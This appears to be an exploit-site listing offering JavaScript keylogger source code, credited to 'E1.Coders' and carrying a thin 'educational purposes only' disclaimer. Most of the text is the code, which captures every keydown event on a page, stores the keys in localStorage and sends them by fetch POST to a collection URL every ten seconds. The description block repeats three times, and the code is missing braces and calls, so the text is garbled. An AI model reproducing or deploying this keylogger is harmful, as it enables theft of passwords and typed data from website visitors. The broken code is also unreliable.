- USDT(TRC-20)
- $0.0
A professional keylogger in JavaScript 2023 last Update code
Code By E1.Coders
Disclaimer: This code is for educational purposes only and should not be used for malicious activities.
It uses a constructor function to create a keylogger object
It uses a hide function to hide the input element
It uses a filter function to remove useless keys such as Shift, Ctrl, Alt, etc.
It uses a save function to store the data in the browser’s local storage
It uses a send function to send the data to the server using the Fetch API
It uses a clear function to clear the stored data in the local storage
It uses a start function to start the keylogger by setting an event listener and a timer
Contact: [email protected]
Threat: Vasilievich Java Script Keylogger
Vulnerability: Payload
Third-party attackers who can guess sensitive information and passwords can easily infiltrate and gain access to the operating system.
Code By E1.Coders
Disclaimer: This code is for educational purposes only and should not be used for malicious activities.
It uses a constructor function to create a keylogger object
It uses a hide function to hide the input element
It uses a filter function to remove useless keys such as Shift, Ctrl, Alt, etc.
It uses a save function to store the data in the browser’s local storage
It uses a send function to send the data to the server using the Fetch API
It uses a clear function to clear the stored data in the local storage
It uses a start function to start the keylogger by setting an event listener and a timer
Contact: [email protected]
Threat: Vasilievich Java Script Keylogger
Vulnerability: Payload
Third-party attackers who can guess sensitive information and passwords can easily infiltrate and gain access to the operating system.
// A professional keylogger in JavaScript 2023
// Code By E1.Coders
// Disclaimer: This code is for educational purposes only and should not be used for malicious activities.
// It uses a constructor function to create a keylogger object
// It uses a hide function to hide the input element
// It uses a filter function to remove useless keys such as Shift, Ctrl, Alt, etc.
// It uses a save function to store the data in the browser’s local storage
// It uses a send function to send the data to the server using the Fetch API
// It uses a clear function to clear the stored data in the local storage
// It uses a start function to start the keylogger by setting an event listener and a timer
// Contact: [email protected]
// Threat: Vasilievich Java Script Keylogger
// Vulnerability: Payload
// Third-party attackers who can guess sensitive information and passwords can easily infiltrate and gain access to the operating system.
// Define a constructor function for the keylogger object
function Keylogger(url) {
// Set the URL to send the data to
this.url = url;
// Create a hidden input element to capture the keystrokes
this.input = document.createElement("input");
this.input.type = "hidden";
this.input.id = "keylogger";
// Define a method to hide the input element
Keylogger.prototype.hide = function() {
// Set the input style to be invisible
this.input.style.display = "none";
// Define a method to filter the useless keys
Keylogger.prototype.filter = function(key) {
// Define an array of useless keys
var uselessKeys = ["Shift", "Control", "Alt", "Meta", "CapsLock", "Tab", "Enter", "Escape", "ArrowUp", "ArrowDown", "ArrowLeft", "ArrowRight"];
// Check if the key is in the array
if (uselessKeys.includes(key)) {
// Return false to indicate that the key should be ignored
return false;
} else {
// Return true to indicate that the key should be recorded
return true;
// Define a method to save the data in the local storage
Keylogger.prototype.save = function(key) {
// Get the current value of the input element
var value = this.input.value;
// Append the key to the value
value += key;
// Set the input value to the new value
this.input.value = value;
// Store the value in the local storage with the key "data"
localStorage.setItem("data", value);
// Define a method to send the data to the server using Fetch API
Keylogger.prototype.send = function() {
// Get the value from the local storage with the key "data"
var value = localStorage.getItem("data");
// Check if the value is not empty
if (value) {
// Create a parameter object with the key "data" and the value
var params = { data: value };
// Convert the parameter object to a query string
var queryString = Object.keys(params)
.map((key) => key + "=" + params[key])
// Use the Fetch API to send a POST request to the URL with the query string
fetch(this.url, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
body: queryString,
.then((response) => {
// Check if the response is successful
if (response.ok) {
// Clear the stored data in the local storage
.catch((error) => {
// Handle any errors
// Define a method to clear the stored data in the local storage
Keylogger.prototype.clear = function() {
// Set the input value to an empty string
this.input.value = "";
// Remove the item with the key "data" from the local storage
// Define a method to start the keylogger
Keylogger.prototype.start = function() {
// Hide the input element
// Add an event listener to the document to record the keystrokes
document.addEventListener("keydown", (event) => {
// Get the key pressed
var key = event.key;
// Check if the key should be recorded
if (this.filter(key)) {
// Save the key in the local storage
// Set an interval to send the data to the server every 10 seconds
setInterval(() => {
}, 10000);
// Create a new keylogger object with the URL of the server
var keylogger = new Keylogger("https://example.com/logger.php");
// Start the keylogger